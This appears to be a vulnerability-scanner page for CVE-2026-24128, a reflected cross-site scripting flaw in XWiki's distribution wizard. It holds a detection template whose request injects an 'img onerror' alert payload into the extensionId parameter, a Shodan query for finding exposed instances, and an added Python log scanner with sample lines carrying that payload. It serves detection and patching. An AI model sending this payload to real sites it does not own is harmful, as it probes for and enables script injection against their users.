
XWiki Platform Distribution Flavor Main - Cross-Site Scripting

CVE-2026-24128
Verified

Description

XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.

Severity

Medium

CVSS Score

6.1

Exploit Probability

0%

Affected Product

xwiki-platform-distribution-flavor-main

Published Date

January 28, 2026

Template Author

ritikchaddha

CVE-2026-24128.yaml
id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.00063
    epss-percentile: 0.1962
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c52e261d5609b34d0e6b37e3cc953fd4832f325d68c2c06255caf5d4c17e84e30220641783567f1bc14f4e1898ccfc2d255a5387674fff64fba8e91d4dec19247b82:922c64590222798bb761d5b6d8e72950
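As an added defensive example (not part of the template above or of XWiki's own code), the following Python scans constructed access-log lines for the request shape the template probes: a distribution-wizard page view (xpage=distribution) whose extensionId is not a plain Maven coordinate or carries HTML metacharacters after decoding. The common log format and the "groupId:artifactId" shape of legitimate ids are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: legitimate extension ids are Maven coordinates such as
# org.xwiki.platform:xwiki-platform-distribution-flavor-main
EXTENSION_ID_RE = re.compile(r"^[A-Za-z0-9_.\-]+:[A-Za-z0-9_.\-]+$")
HTML_META_RE = re.compile(r"[<>\"']")
# Assumed common log format: client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def check_request_path(path):
    """Return a finding for a distribution-wizard request with a suspicious extensionId, else None."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values once
    if qs.get("xpage", [""])[0] != "distribution":
        return None
    for value in qs.get("extensionId", []):
        value = unquote(value)  # second pass catches double-encoded values
        if HTML_META_RE.search(value) or not EXTENSION_ID_RE.match(value):
            return {"path": parts.path, "extensionId": value}
    return None


def scan_access_log(lines):
    """Run check_request_path over access-log lines and return the findings."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a recognised access-log line
        finding = check_request_path(m.group("path"))
        if finding:
            finding.update(client=m.group("client"), status=int(m.group("status")))
            findings.append(finding)
    return findings


# Constructed sample log lines: an ordinary page view, a legitimate install
# request, and one carrying the probe value used by the template above.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jan/2026:10:14:55 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 8812',
    '203.0.113.5 - - [28/Jan/2026:10:15:01 +0000] "GET /xwiki/bin/view/XWiki/Main?xpage=distribution'
    '&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-main'
    '&extensionVersion=17.6.0 HTTP/1.1" 200 5123',
    '203.0.113.7 - - [28/Jan/2026:10:16:42 +0000] "GET /xwiki/bin/view/XWiki/Main?xpage=distribution'
    '&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-main'
    'wikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0'
    ' HTTP/1.1" 200 5340',
]
```

Calling scan_access_log(SAMPLE_LOG) returns a single finding, for the third line, with the decoded extensionId and the client address; the legitimate install request on the second line is not flagged.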

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
CVE-2026-24128
CWE ID:
CWE-79

References

https://jira.xwiki.org/browse/XWIKI-23462
https://nvd.nist.gov/vuln/detail/CVE-2026-24128